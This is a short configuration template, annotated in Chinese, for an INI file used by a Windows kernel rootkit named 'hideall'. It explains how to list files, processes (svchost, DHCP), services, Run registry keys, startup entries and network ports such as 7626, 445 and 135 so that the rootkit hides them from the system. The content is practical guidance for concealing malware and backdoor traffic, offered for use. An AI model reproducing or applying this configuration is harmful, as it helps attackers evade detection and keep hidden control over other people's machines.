hideall.ini 书写注意事项:
[Settings]
FileMappingName=_.-=[hideall]=-._
ServiceName=hideall
ServiceDisplayName=hideall service
ServiceDescription=hideall NT rootkit
//[Settings] 中每一项都必须设置
[Hidden Table]
hideme*
//[Hidden Table]中设置要隐藏的文件名,大多数情况下要用通配符 *
[Hidden Processes]
hideme*
svchost*
//[Hidden Processes]填写要隐藏的进程名,大多数情况下要用通配符 *
[Hidden Services]
hideme*
DHCP*
//[Hidden Services]填写要隐藏的服务名,大多数情况下要用通配符 *
[Hidden RegKeys]
hideme
LEGACY_hideme
Run
//[Hidden RegKeys]填写要隐藏的注册表键名,大多数情况下要用通配符 *
[Hidden RegValues]
AUState*
//[Hidden RegKeys]填写要隐藏的注册表键值名,大多数情况下要用通配符 *
[Startup Run]
//[Startup Run]填写要隐藏的启动项里的启动项名称,大多数情况下要用通配符 *
[Hidden Ports]
TCPI:7626,1241,445,135
TCPO:445,139
UDP:445,138,500
//[Hidden Ports]填写要隐藏的协议端口号,用 , 隔开